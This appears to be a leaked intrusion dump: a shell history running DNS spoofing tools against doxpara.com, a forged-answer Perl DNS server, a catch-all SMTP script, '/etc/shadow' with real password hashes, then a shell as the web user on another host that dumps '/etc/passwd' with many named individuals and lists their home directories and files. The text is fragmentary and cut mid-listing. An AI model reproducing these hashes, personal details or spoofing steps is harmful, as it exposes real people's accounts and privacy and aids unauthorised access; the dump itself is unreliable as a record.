/usr/local/lib/libldns.so.1 /usr/lib/libldns.so.1 ./phonym doxpara.com ./phonym doxpara.com dig @backend.doxpara.com foo.com dig @backend.doxpara.com foobar.com fg vim phonym.c gcc -o phonym phonym.c -lldns ./phonym doxpara.com ifconfig ./phonym doxpara.com ./phonym doxpara.com ./phonym doxpara.com ./phonym doxpara.com ./phonym doxpara.com ./phonym doxpara.com ./phonym doxpara.com ./phonym doxpara.com ./phonym doxpara.com screen -D -R screen -D -R cd perl dns perl dns.pl fg vim dns.pl perl dns.pl fg perl dns.pl fg perl dns.pl fg perl dns.pl fg perl dns.pl fg perl dns.pl fg perl dns.pl ls ls -l man emacs emacs man vi man vim ls ../ pwd home ls ../usr/ ls ../home ls /bin exit exit exit w ls screen -D -R ls vim dnsrake_hacdc.c gcc -o phonym phonym.c -lldns gcc -o dnsrake_hacdc dnsrake_hacdc.c perl hacdcdemo.pl ps axf | grep -i perl ps axf | grep -i pl perl hacdcdemo.pl vim hacdcdemo.pl perl hacdcdemo.pl vim hacdcdemo.pl perl hacdcdemo.pl fg vim hacdcdemo.pl perl hacdcdemo.pl screen -d -R screen -D -R gcc -o dnsrake_hacdc dnsrake_hacdc.c ./dnsrake_hacdc 209.40.204.174 65.54.240.126 www.doxpara.com 1203 6.6.6.6 500 $RANDOM.www.doxpara.com ./dnsrake_hacdc 209.40.204.174 65.54.240.126 www.doxpara.com 1203 6.6.6.6 500 $RANDOM.www.doxpara.com ifconfig ps -axf | grep perl kill 29374 ps -axf | grep perl screen -D -R curl http://68.49.183.84 curl http://68.49.183.84 ls ls -l *.pl dig @deluvian.doxpara.com foo.com dig +dnssec @deluvian.doxpara.com foo.com dig +dnssec @deluvian.doxpara.com yahoo.com dig +dnssec @deluvian.doxpara.com yahoo.com +short dig +dnssec @deluvian.doxpara.com cnn.com +short dig +dnssec @deluvian.doxpara.com metafilter.com +short dig +dnssec @deluvian.doxpara.com facebook.com +short dig +dnssec @deluvian.doxpara.com facebook.com +short dig +dnssec @deluvian.doxpara.com facebook.com +short dig +dnssec @deluvian.doxpara.com facebook.com +short dig +dnssec @deluvian.doxpara.com facebook.com +short dig +dnssec @deluvian.doxpara.com facebook.com +short dig +dnssec @deluvian.doxpara.com facebook.com +short dig +dnssec @deluvian.doxpara.com facebook.com +short dig +dnssec @deluvian.doxpara.com facebook.com +short dig +dnssec @deluvian.doxpara.com facebook.com +short dig +dnssec @deluvian.doxpara.com www.cnn.com +short ps ax PID TTY STAT TIME COMMAND 1 ? Ss 0:00 init [2] 2 ? S 0:00 [migration/0] 3 ? SN 0:00 [ksoftirqd/0] 4 ? S 0:00 [watchdog/0] 5 ? S< 0:00 [events/0] 6 ? S< 0:00 [khelper] 7 ? S< 0:00 [kthread] 9 ? S< 0:00 [xenwatch] 10 ? S< 0:00 [xenbus] 16 ? S< 0:00 [kblockd/0] 17 ? S< 0:00 [cqueue/0] 21 ? S< 0:00 [khubd] 23 ? S< 0:00 [kseriod] 76 ? S 0:00 [pdflush] 78 ? D< 0:00 [kswapd0] 79 ? S< 0:00 [aio/0] 220 ? S< 0:00 [kpsmoused] 243 ? S< 0:00 [ata/0] 244 ? S< 0:00 [ata_aux] 255 ? S< 0:00 [ksnapd] 260 ? S< 0:03 [kjournald] 346 ? Sprint; my $ttl = 300; if ($qtype eq "A" and $qname ne "ns1.toorrr.com") { push @ans, Net::DNS::RR->new("$qname $ttl $qclass CNAME www.doxpara.com"); push @ans, Net::DNS::RR->new("$qname $ttl $qclass A 4.3.2.1"); #push @ans, Net::DNS::RR->new("ns1.toorrr.com $ttl $qclass A 1.2.3.4"); #push @ans, Net::DNS::RR->new("ns1.toorrr.com $ttl $qclass A 209.200.168.66"); $rcode = "NOERROR"; } elsif ($qtype eq "A" and $qname eq "ns1.toorrr.com") { push @ans, Net::DNS::RR->new("ns1.toorrr.com $ttl $qclass A 1.2.3.4"); push @ans, Net::DNS::RR->new("ns1.toorrr.com $ttl $qclass A 209.200.168.66"); $rcode = "NOERROR"; }elsif( $qtype eq "MX" ) { push @ans, Net::DNS::RR->new("$qname $ttl $qclass $qtype 10 mail.$qname"); push @add, Net::DNS::RR->new("mail.$qname $ttl $qclass A 209.40.204.236"); $rcode = "NOERROR"; }else{ $rcode = "NXDOMAIN"; } # mark the answer as authoritive (by setting the 'aa' flag return ($rcode, \@ans, \@auth, \@add, { aa => 1 }); } my $ns = Net::DNS::Nameserver->new( LocalPort => 53, ReplyHandler => \&reply_handler, Verbose => 2, ) || die "couldn't create nameserver object\n"; $ns->main_loop; head -n 10 dnsrake_hacdc.c #define __FAVOR_BSD #define FAVOR_BSD #include #include #include #include #include #include #include cat mail.pl use IO::Socket::INET; use Net::Server::Mail::SMTP; use Data::Dumper; use MIME::QuotedPrint; my @local_domains = qw(example.com example.org); my $server = new IO::Socket::INET Listen => 1, LocalPort => 25, ReuseAddr=>1; my $conn; while($conn = $server->accept) { my $smtp = new Net::Server::Mail::SMTP socket => $conn; $smtp->set_callback(RCPT => \&validate_recipient); $smtp->set_callback(DATA => \&queue_message); $smtp->process(); $conn->close(); } sub validate_recipient { my($session, $recipient) = @_; return(1); } sub queue_message { my($session, $data) = @_; print decode_qp($$data); return(1, 250, "message queued"); } cat /etc/shadow root:$1$Qa/UTuhe$mxFnYK2t788AwbgOP.e6Q/:14280:0:99999:7::: daemon:*:14131:0:99999:7::: bin:*:14131:0:99999:7::: sys:*:14131:0:99999:7::: sync:*:14131:0:99999:7::: games:*:14131:0:99999:7::: man:*:14131:0:99999:7::: lp:*:14131:0:99999:7::: mail:*:14131:0:99999:7::: news:*:14131:0:99999:7::: uucp:*:14131:0:99999:7::: proxy:*:14131:0:99999:7::: www-data:*:14131:0:99999:7::: backup:*:14131:0:99999:7::: list:*:14131:0:99999:7::: irc:*:14131:0:99999:7::: gnats:*:14131:0:99999:7::: nobody:*:14131:0:99999:7::: libuuid:!:14131:0:99999:7::: dhcp:*:14131:0:99999:7::: syslog:*:14131:0:99999:7::: klog:*:14131:0:99999:7::: sshd:*:14131:0:99999:7::: mysql:!:14132:0:99999:7::: postfix:*:14236:0:99999:7::: dovecot:*:14236:0:99999:7::: maildrop:$1$D6ET03sF$UUYNboLjEtwUO3JbOsJEp1:14236:0:99999:7::: !~~~~~~~~~~~ www.doxpara.com ~~~~~~~~~~! $ uname -a; id FreeBSD shaitan1.lightconsulting.com 6.2-RELEASE-p4 FreeBSD 6.2-RELEASE-p4 #0: Thu Apr 26 17:40:53 UTC 2007 root at i386-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC i386 uid=80(www) gid=80(www) groups=80(www), 1001(thalakan), 1056(skippy) $ pwd / $ cat /etc/passwd # $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ # root:*:0:0:Charlie &:/root:/usr/local/bin/bash toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin operator:*:2:5:System &:/:/usr/sbin/nologin bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin news:*:8:8:News Subsystem:/:/usr/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin _dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin thalakan:*:1001:1001:Jason Spence:/home/thalakan:/bin/tcsh nouveaux:*:1006:1006:nouveaux:/home/nouveaux:/usr/local/bin/bash jspence:*:1001:1001:JSpence:/home/jspence:/usr/local/bin/bash atheris:*:1000:1000:Atheris:/home/atheris:/usr/local/bin/bash sokol:*:1010:1010:John Sokol:/home/sokol:/bin/sh vintasia:*:1008:1008:vintasia:/home/vintasia:/usr/local/bin/bash arc:*:1004:1004:archives user:/home/arc:/nonexistent rsb:*:1009:1009:Rich Bodo:/home/rsb:/usr/local/bin/bash eschur:*:1003:1003:Ethan Schur:/home/eschur:/bin/tcsh zahl:*:1005:1005:Bleu Zahl:/home/zahl:/usr/local/bin/bash fia:*:1012:1012:Fernando's Insurance:/home/fia:/nonexistent mysql:*:88:88:MySQL Daemon:/var/db/mysql:/sbin/nologin eddyboy:*:1007:1007:Ed Vergara:/home/eddyboy:/usr/local/bin/bash ragingworker:*:1013:1013:john McGee:/home/ragingworker:/usr/local/bin/bash jlm:*:1014:1014:John McGuffick:/home/jlm:/usr/local/bin/bash greasythug:*:1015:1015:Kae Saeteurn:/home/greasythug:/usr/local/bin/bash donnamatrix:*:1016:1016:Stephanie I don't have a last name:/home/donnamatrix:/usr/local/bin/bash dmarti:*:1017:1017:Don Marti:/home/dmarti:/usr/local/bin/bash schoen:*:1018:1018:Seth Schoen:/home/schoen:/usr/local/bin/bash unixsurplus:*:1019:1019:John Bodo:/home/unixsurplus:/usr/local/bin/bash nblasgen:*:1020:1020:Nick Blasgen:/home/nblasgen:/usr/local/bin/bash jbodo[disabled]:*:1021:1019:John Bodo:/home/jbodo:/usr/local/bin/bash dan:*:1022:1022:Dan Kaminski:/home/dan:/usr/local/bin/bash debian:*:1023:1023:Debian Archives:/home/debian:/usr/bin/bash lspencedsn:*:1024:1024:Linda Spence:/home/lspencedsn:/usr/local/bin/bash mbagley:*:1011:1011:Mark Bagley:/home/mbagley:/bin/tcsh www:*:80:80:World Wide Web Owner:/nonexistent:/sbin/nologin effugas:*:1025:1025:Dan Kaminsky:/home/effugas:/usr/local/bin/bash pj:*:1026:1026:Packet Junkie:/home/pj:/usr/local/bin/bash mailman:*:91:91:Mailman User:/usr/local/mailman:/sbin/nologin ftpunixsurplus:*:1027:1027:Unix Surplus FTP:/home/ftpunixsurplus:/usr/local/bin/bash nagios:*:1028:1028:Nagios pseudo-user:/usr/local/var/nagios:/nonexistent x30n:*:1029:1029:x30n:/home/x30n:/usr/local/bin/bash addp4:*:1030:1030:addp4:/home/addp4:/usr/local/bin/bash test1:*:1031:1019:test1:/home/test1:/usr/bin/bash gpower:*:1032:1019:unixsurplus:/home/unixsurplus:/usr/local/bin/bash geeksupply:*:1033:1019:unixsurplus:/home/unixsurplus:/usr/local/bin/bash digrev:*:1034:1034:Digital Revelation:/home/digrev:/usr/local/bin/bash beansprout:*:1035:1035:Kevin Sexton:/home/beansprout:/usr/local/bin/bash submicron:*:1037:1037:Gary Buckmaster:/home/submicron:/usr/local/bin/bash hackerjoe:*:1038:1038:Hacker Joe:/home/hackerjoe:/usr/local/bin/bash pond:*:1039:1039:The Pond:/home/pond:/usr/local/bin/bash oracle:*:1036:999:oracle:/home/oracle:/usr/local/bin/bash drfed:*:1040:1040:Dr. Fed:/home/drfed:/usr/local/bin/bash visigoth:*:1041:1041:visigoth:/home/visigoth:/usr/local/bin/bash tagrrr:*:1042:1042:tagrrr:/home/tagrrr:/usr/local/bin/bash freak:*:1043:1043:freak:/home/freak:/usr/local/bin/bash temtel:*:1044:1044:temtel:/home/temtel:/usr/local/bin/bash peter:*:1002:1002:Peter Wang:/home/peter:/usr/local/bin/bash anoncvs:*:1045:1045:anoncvs:/home/anoncvs:/usr/local/bin/bash multivac:*:1046:1046:Mike Jerabek:/home/multivac:/usr/local/bin/bash ej:*:1049:1049:Eugenio Jarosiewicz:/home/ej:/usr/local/bin/bash jnoland:*:1050:1050:jnoland:/home/jnoland:/usr/local/bin/bash dnetc:*:105:105:distributed.net client pseudo-user:/nonexistent:/sbin/nologin aquafire:*:1048:1048:aquafire:/home/aquafire:/usr/local/bin/bash dimsum:*:1051:1051:dimsum:/home/dimsum:/usr/local/bin/bash travis:*:1052:1052:travis:/home/travis:/usr/local/bin/bash dtopham:*:1053:1053:User &:/home/dtopham:/bin/sh gdm:*:92:92:GNOME Display Manager:/nonexistent:/sbin/nologin v1ru5:*:1054:1054:User &:/home/v1ru5:/bin/sh pgibson:*:1055:1055:User &:/home/pgibson:/bin/sh skippy:*:1056:1056:User &:/home/skippy:/usr/local/bin/bash brian:*:1057:1057:User &:/home/brian:/bin/sh sith:*:1058:1058:sucka please,around the belly button:/home/sith:/usr/local/bin/bash dovecot:*:1059:1059:Dovecot:/home/dovecot:/sbin/nologin bob:*:1060:1060:User &:/home/bob:/bin/shh abaddon:*:1061:1062:User &:/home/abaddon:/bin/sh spamd:*:58:58:SpamAssassin user:/var/spool/spamd:/sbin/nologin six:*:1062:1063:User &:/home/six:/bin/sh frog:*:1063:1064:User &:/home/frog:/bin/sh mother:*:1064:1065:Greg Carothers:/home/mother:/usr/local/bin/bash anonpoet:*:1065:1066:User &:/home/anonpoet:/bin/sh drifter:*:1066:1067:Drifter:/home/drifter:/usr/local/bin/bash plastic:*:1067:1068:User &:/home/plastic:/bin/sh tspwh:*:1068:1069:User &:/home/tspwh:/bin/sh darch:*:1069:1070:User &:/home/darch:/bin/sh wd40:*:1070:1071:User &:/home/wd40:/bin/sh iphelix:*:1071:1072:User &:/home/iphelix:/bin/sh postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin nightfall:*:1072:1073:User &:/home/nightfall:/bin/sh messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin bannor:*:1073:1074:User &:/home/bannor:/bin/sh unredo:*:1074:1075:User &:/home/unredo:/bin/sh mct:*:1075:1076:User &:/home/mct:/bin/sh t:*:1076:1077:User &:/home/t:/bin/sh $ cd /home $ ls -al total 248974 drwxr-xr-x 73 root wheel 1536 Jun 26 04:56 . drwxr-xr-x 16 root wheel 512 Sep 22 2007 .. drwxr-xr-x 3 abaddon abaddon 512 Dec 31 2005 abaddon drwxr-xr-x 2 addp4 addp4 512 Oct 30 2002 addp4 drwxr-xr-x 2 anoncvs anoncvs 512 Sep 29 2003 anoncvs drwxr-xr-x 2 anonpoet anonpoet 512 May 10 2006 anonpoet drwxr-xr-x 5 aquafire aquafire 512 Jul 19 2006 aquafire drwxr-xr-x 2 arc arc 512 Apr 9 2003 arc drwxr-xr-x 18 atheris atheris 1024 Apr 23 23:31 atheris drwxr-xr-x 3 bannor bannor 512 Jan 24 05:51 bannor drwxr-xr-x 2 beansprout beansprout 512 Feb 26 2003 beansprout drwxr-xr-x 3 bob bob 512 Mar 27 2006 bob drwxr-xr-x 2 brian brian 512 May 5 2005 brian drwxr-xr-x 2 dan dan 512 Mar 7 2002 dan drwxr-xr-x 2 darch darch 512 Dec 4 2006 darch drwxr-xr-x 2 debian debian 512 Aug 22 2005 debian drwxrwx--- 21 digrev digrev 1024 Jul 30 2006 digrev drwxr-xr-x 6 dimsum dimsum 512 Apr 17 2006 dimsum drwxr-xr-x 3 dmarti dmarti 512 Jan 24 2002 dmarti drwxr-xr-x 2 donnamatrix donnamatrix 512 Jan 24 2002 donnamatrix drwxr-xr-x 2 drfed drfed 512 Jul 5 2003 drfed drwxr-xr-x 4 drifter drifter 512 Dec 4 2006 drifter drwxr-xr-x 2 dtopham dtopham 512 Feb 15 2005 dtopham drwxr-xr-x 3 eddyboy eddyboy 512 Jan 24 2002 eddyboy drwxr-xr-x 31 effugas effugas 2048 Sep 22 2008 effugas drwxr-xr-x 3 ej ej 512 Jun 4 2004 ej drwxr-xr-x 26 eschur eschur 1536 Nov 3 2007 eschur drwxr-xr-x 2 fia fia 512 Jan 24 2002 fia drwx------ 12 freak freak 1024 Feb 21 2008 freak drwxr-xr-x 2 ftpunixsurplus ftpunixsurplus 512 Aug 27 2002 ftpunixsurplus drwxr-xr-x 2 greasythug greasythug 512 Jan 24 2002 greasythug drwxr-xr-x 2 hackerjoe hackerjoe 512 Apr 23 2003 hackerjoe drwxr-xr-x 2 iphelix iphelix 512 Sep 11 2007 iphelix -rw-r--r-- 1 root wheel 254609557 Oct 2 2007 jbodo.tar.gz drwxr-xr-x 2 jlm jlm 512 Jan 24 2002 jlm drwxr-xr-x 3 jnoland jnoland 512 Sep 24 2007 jnoland drwx------ 2 nobody effugas 512 Mar 12 2007 lost+found drwxr-xr-x 2 lspencedsn lspencedsn 512 Jun 2 2002 lspencedsn drwxr-xr-x 6 mbagley mbagley 512 Jan 30 2008 mbagley drwxr-xr-x 2 mct mct 512 Jun 9 01:15 mct drwxr-xr-x 5 mother mother 512 Dec 23 2007 mother drwxr-xr-x 4 multivac multivac 512 Apr 1 20:04 multivac drwxr-xr-x 3 nblasgen nblasgen 512 May 23 2007 nblasgen drwxr-xr-x 2 nightfall nightfall 512 Oct 8 2007 nightfall drwx--x--x 33 nouveaux nouveaux 3072 Jul 18 2008 nouveaux drwxr-xr-x 3 oracle oracle 512 Jun 3 2004 oracle drwxr-xr-x 5 peter peter 512 Sep 13 2006 peter drwxr-xr-x 3 pgibson pgibson 512 Apr 18 2005 pgibson drwxr-xr-x 3 pj pj 512 Dec 19 2002 pj drwx------ 3 plastic plastic 512 Feb 6 12:59 plastic drwxr-x--x 11 pond pond 1024 Sep 3 2007 pond drwxr-xr-x 3 ragingworker ragingworker 512 Feb 25 2002 ragingworker drwxr-xr-x 6 rsb rsb 512 Jan 24 2002 rsb drwxr-xr-x 2 schoen schoen 512 Jan 24 2002 schoen drwx------ 6 sith sith 512 Jun 10 2006 sith drwxrwsr-x 5 six six 512 Apr 8 01:09 six -rw-r--r-- 1 root wheel 800 Sep 3 2007 sizes drwxr-x--- 5 skippy skippy 512 Oct 19 2005 skippy drwxr-xr-x 3 sokol sokol 512 Aug 12 2006 sokol drwxr-xr-x 11 submicron submicron 1024 Mar 17 2008 submicron drwxr-xr-x 3 t t 512 Jun 26 04:57 t drwxr-xr-x 2 tagrrr tagrrr 512 Jul 15 2003 tagrrr drwxr-xr-x 6 temtel temtel 1024 Jun 9 2006 temtel drwxr-xr-x 2 test1 test1 512 Aug 26 2005 test1 drwxr-x--- 141 thalakan thalakan 26112 Jul 20 09:10 thalakan drwxr-xr-x 8 travis travis 512 May 2 2006 travis drwxr-xr-x 3 tspwh tspwh 512 Feb 1 2008 tspwh drwxr-xr-x 9 atheris atheris 1024 Sep 24 2007 unixsurplus drwxr-xr-x 2 unredo unredo 512 Mar 12 15:21 unredo drwxr-xr-x 2 root wheel 512 Mar 13 2005 v1ru5 drwxr-xr-x 3 vintasia vintasia 512 Jan 24 2002 vintasia drwxr-xr-x 2 visigoth visigoth 512 Jul 5 2003 visigoth drwxr-xr-x 2 wd40 wd40 2048 Sep 26 2007 wd40 drwxr-xr-x 7 x30n x30n 512 Nov 21 2006 x30n drwxr-xr-x 8 zahl zahl 1024 Jun 25 2002 zahl $ cd effugas $ ls -al total 9506018 -rw-r--r-- 1 effugas effugas 344 Feb 19 2006 ! drwxr-xr-x 31 effugas effugas 2048 Sep 22 2008 . drwxr-xr-x 73 root wheel 1536 Jun 26 04:56 .. drwx------ 3 effugas effugas 512 Sep 26 2005 .BitchX -rw------- 1 effugas effugas 7772 Jun 4 11:56 .bash_history drwxr-xr-x 5 effugas effugas 512 Oct 31 2005 .cpan -rw-r--r-- 1 effugas effugas 771 Aug 9 2002 .cshrc drwxr-xr-x 3 effugas effugas 512 Mar 16 2005 .emacs.d -rw------- 1 effugas effugas 42 Sep 22 2008 .lesshst drwx------ 2 effugas effugas 512 Feb 19 2006 .links -rw-r--r-- 1 effugas effugas 255 Aug 9 2002 .login -rw-r--r-- 1 effugas effugas 165 Aug 9 2002 .login_conf -rw------- 1 effugas effugas 371 Aug 9 2002 .mail_aliases -rw-r--r-- 1 effugas effugas 331 Aug 9 2002 .mailrc -rw------- 1 effugas effugas 5478 Jul 25 2008 .mysql_history -rw-r--r-- 1 effugas effugas 789 Aug 9 2002 .profile -rw------- 1 effugas effugas 276 Aug 9 2002 .rhosts -rw-r--r-- 1 effugas effugas 852 Aug 9 2002 .shrc drwxr-xr-x 2 effugas effugas 512 Aug 1 2004 .ssh -rw-r--r-- 1 effugas effugas 785514 Apr 3 2007 DSCF7896.JPG drwxr-xr-x 2 effugas effugas 512 Jun 28 2004 Desktop -rw-r--r-- 1 effugas effugas 62548 Nov 29 2005 HTTP-Proxy.tar.gz -rwxr-xr-x 1 effugas effugas 266 Jan 29 2005 OzyBench.pm -rwxr-xr-x 1 effugas effugas 8872 Jan 29 2005 OzyResolve.pm drwx------ 2 effugas effugas 512 Apr 14 2003 Pics drwxr-xr-x 2 effugas effugas 512 Dec 20 2004 admin -rw-r--r-- 1 effugas effugas 0 Apr 16 2006 airhook-2.tar.gz lrwxr-xr-x 1 effugas effugas 26 Apr 16 2003 albums -> doxpara/pics/picKLE-albums -rw-r--r-- 1 effugas effugas 29884 Apr 27 2006 cal311.rle -rwx------ 1 effugas effugas 16384 Sep 30 2005 cc.doc -rw-r--r-- 1 effugas effugas 2272 Dec 20 2004 ctry_usage_200412.png -rw-r--r-- 1 effugas effugas 2501 Dec 20 2004 daily_usage_200412.png -rw-r--r-- 1 effugas effugas 9 Nov 19 2007 delete_this_plz_k_thx drwxr-xr-x 5 effugas effugas 512 May 29 2005 dltrace-0.5 -rw-r--r-- 1 effugas effugas 198330 Apr 28 2005 dltrace-0.5.tar.bz2 drwxrwxrwx 124 effugas effugas 28672 Jul 18 06:22 doxpara -rw-r--r-- 1 effugas effugas 753427 Oct 17 2007 drupal-5.3.tar.gz -rw-r--r-- 1 effugas effugas 1588 Dec 20 2004 hourly_usage_200412.png -rw-r--r-- 1 root effugas 216555114 Jul 20 09:10 httpd-doxpara-error.log -rw-r--r-- 1 root effugas 9452989787 Jul 20 09:10 httpd-doxpara.log drwxr-xr-x 2 effugas effugas 512 Jun 14 2005 huh -rw-r--r-- 1 effugas effugas 10138487 Nov 24 2007 huh.gz -rw-r--r-- 1 effugas effugas 104 Nov 24 2007 huh2.gz -rw-r--r-- 1 effugas effugas 18093548 Nov 24 2007 huh_new.gz -rw-r--r-- 1 effugas effugas 15748938 Nov 24 2007 huh_shai.gz -rw-r--r-- 1 effugas effugas 617 Jul 28 2003 id_dsa-dan_needs_to_drink_more.pub -rw-r--r-- 1 effugas effugas 236 Nov 14 2002 id_rsa.pub drwxr-xr-x 2 effugas effugas 512 Dec 25 2003 igi-udp -rw-r--r-- 1 effugas effugas 18720 Mar 24 2003 igi-udp.tgz -rw-r--r-- 1 effugas effugas 0 Sep 22 2008 index.html -rw-r--r-- 1 effugas effugas 6552 Apr 27 2006 input.pgm -rw-r--r-- 1 effugas effugas 19432 Apr 27 2006 input.ppm -rw-r--r-- 1 effugas effugas 10516 Apr 27 2006 input.rle drwx------ 2 effugas effugas 512 Sep 9 2005 mad_bike drwxr-xr-x 10 effugas effugas 1024 Nov 9 2002 minewt -rw-r--r-- 1 effugas effugas 10832895 Jul 8 2008 new2.db.gz drwxr-xr-x 2 effugas effugas 512 Feb 20 2006 offline drwxr-sr-x 2 effugas effugas 512 Sep 16 2003 onesixtyone-0.3.1 drwxr-xr-x 2 effugas effugas 512 Jan 19 2005 ozy2 -rwxr-xr-x 1 effugas effugas 437 Jan 29 2005 ozybench.pl drwxr-xr-x 4 effugas effugas 512 Dec 25 2003 pathchirp-2.3.3 -rw-r--r-- 1 effugas effugas 60375 Sep 13 2003 pathchirp-2.3.3.tar.gz drwxr-xr-x 3 effugas effugas 512 Jan 28 2005 pathchirp-2.3.7 -rw-r--r-- 1 effugas effugas 59321 Sep 6 2004 pathchirp-2.3.7.tar.gz drwxr-xr-x 3 effugas effugas 512 Oct 31 2005 perl drwxr-xr-x 3 effugas effugas 512 Feb 19 2006 py -rw-r--r-- 1 effugas effugas 37446 Nov 19 2002 ref -rw-r--r-- 1 effugas effugas 41381 Dec 7 2004 ref.txt -rw-r--r-- 1 effugas effugas 37446 Nov 19 2002 ref2 -rw-r--r-- 1 effugas effugas 65058 Nov 21 2002 ref3 -rw-r--r-- 1 effugas effugas 105868 Nov 26 2002 ref4 -rw-r--r-- 1 effugas effugas 125464 Dec 1 2002 ref5 drwxr-xr-x 2 effugas effugas 512 Jul 15 2008 reply_here -rw-r--r-- 1 effugas effugas 36946 Apr 19 2005 sm_tool.py drwxr-xr-x 5 effugas effugas 512 Sep 26 2005 sqlite drwxr-xr-x 11 effugas effugas 2048 Sep 26 2005 sqlite-2.8.16 -rw-r--r-- 1 effugas effugas 981834 Sep 26 2005 sqlite-2.8.16.tar.gz drwxr-xr-x 4 effugas effugas 512 Sep 9 2005 stab-1.3.1 drwxr-xr-x 2 effugas effugas 512 Feb 11 2003 temp -rw-r--r-- 1 effugas effugas 61084 Nov 11 2000 test.rle -rw-r--r-- 1 effugas effugas 17 Mar 27 2006 test.txt drwxr-xr-x 3 effugas effugas 512 Jul 13 2005 tmp drwxr-xr-x 6 effugas effugas 512 Jan 17 2006 txt2html-2.44 -rw-r--r-- 1 effugas effugas 117583 Jan 17 2006 txt2html-2.44.tar.gz -rw-r--r-- 1 effugas effugas 137992 Oct 21 2004 up.rle drwxr-xr-x 4 effugas effugas 512 Feb 19 2006 uptest -rw-r--r-- 1 effugas effugas 2072 Dec 20 2004 usage.png -rw-r--r-- 1 effugas effugas 37255 Dec 20 2004 usage_200412.html lrwxr-xr-x 1 effugas effugas 28 Apr 16 2003 van -> albums/2003-Apr14-Vancouver/ -rw-r--r-- 1 effugas effugas 28 Dec 20 2004 webalizer.hist -rw-r--r-- 1 effugas effugas 33721 Jun 5 2007 why_you_do_this.jpg -rwx------ 1 effugas effugas 743720 Jul 19 2003 winscp310.exe -rw-r--r-- 1 effugas effugas 30720 Jan 19 2005 wtf -rw-r--r-- 1 effugas effugas 4084 Apr 19 2005 wtf.foo -rw-r--r-- 1 effugas effugas 0 Nov 18 2002 ~. $ cd doxpara $ ls -la total 691032 drwxrwxrwx 124 effugas effugas 28672 Jul 18 06:22 . drwxr-xr-x 31 effugas effugas 2048 Sep 22 2008 .. -rw-r--r-- 1 effugas effugas 20480 Sep 5 2005 .Frontpage.swm -rw-r--r-- 1 effugas effugas 20480 Apr 19 2005 .Frontpage.swn -rw-r--r-- 1 effugas effugas 20480 Apr 19 2005 .Frontpage.swo -rw------- 1 effugas effugas 20480 Nov 21 2002 .Frontpage.swp -rw------- 1 effugas effugas 12288 Jun 22 2003 .Sidebar.swp -rw-r--r-- 1 effugas effugas 12288 Dec 24 2005 .hikids.html.swp -rwxrwxrwx 1 effugas effugas 1056 Oct 21 2008 .htaccess -rw------- 1 effugas effugas 12288 Feb 2 2006 .obvious.html.swp -rw-r--r-- 1 effugas effugas 5482570 Aug 7 2006 08-07-06_Hackers.mp3 -rw-r--r-- 1 effugas effugas 171 Jan 3 2005 404.php -rwxr--r-- 1 effugas effugas 1779714 Jan 7 2003 777Bitches.mp3 -rw-r--r-- 1 effugas effugas 36848 Feb 11 2001 Acceptance_camoback.jpg -rw-r--r-- 1 effugas effugas 78 Nov 14 2002 Addition.html -rw-r--r-- 1 effugas effugas 192991 Nov 17 2002 Advanced_OpenSSH.pdf -rw-r--r-- 1 effugas effugas 34691 Feb 11 2001 Anger_camoback.jpg -rwxr-xr-x 1 effugas effugas 169984 Mar 5 2003 Applied_Black_Ops_BHW_2003.ppt -rw-r--r-- 1 effugas effugas 301 Feb 11 2001 Arrow_DownLeft.gif -rw-r--r-- 1 effugas effugas 299 Feb 11 2001 Arrow_DownRight.gif -rw-r--r-- 1 effugas effugas 303 Feb 11 2001 Arrow_UpLeft.gif -rw-r--r-- 1 effugas effugas 305 Feb 11 2001 Arrow_UpRight.gif -rw-r--r-- 1 effugas effugas 391680 Apr 17 2003 BabelNet-1_11.doc -rw-r--r-- 1 effugas effugas 36608 Feb 11 2001 Bargaining_camoback.jpg -rw-r--r-- 1 effugas effugas 803840 Nov 15 2002 Black_Ops_Asia.ppt -rw-r--r-- 1 effugas effugas 345088 Jul 29 2004 Black_Ops_DNS_BH.ppt -rw-r--r-- 1 effugas effugas 310272 Nov 15 2002 Black_Ops_DefconX.ppt -rw-r--r-- 1 effugas effugas 1302528 Nov 18 2002 Black_Ops_Hivercon.ppt -rw-r--r-- 1 effugas effugas 1275904 Dec 24 2002 Black_Ops_Hivercon_Final.ppt -rw-r--r-- 1 effugas effugas 8910773 Nov 14 2002 Black_Ops_Of_TCPIP2.pdf -rw-r--r-- 1 effugas effugas 458752 Aug 1 2005 Black_Ops_Of_TCPIP_2005.ppt -rw-r--r-- 1 effugas effugas 20255 Aug 14 2005 CHANGELOG.txt -rw-r--r-- 1 effugas effugas 21038 Feb 11 2001 Caere_General_Privacy_Protection_Fault.gif -rw-r--r-- 1 effugas effugas 21807 Feb 11 2001 Caere_Illegal_Operation.gif -rw-r--r-- 1 effugas effugas 36644 Feb 11 2001 Case_Study_camoback.jpg -rw-r--r-- 1 effugas effugas 36319 Feb 11 2001 Conclusion_camoback.jpg -rw-r--r-- 1 effugas effugas 176550 Nov 4 2008 CssFilter_1.0.zip -rwxr-xr-x 1 effugas effugas 2526208 Aug 3 2007 DMK_BO2K7_Web.ppt -rwxrwxrwx 1 effugas effugas 3480064 Aug 15 2008 DMK_BO2K8.ppt -rwxrwxrwx 1 effugas effugas 2673664 Feb 20 08:52 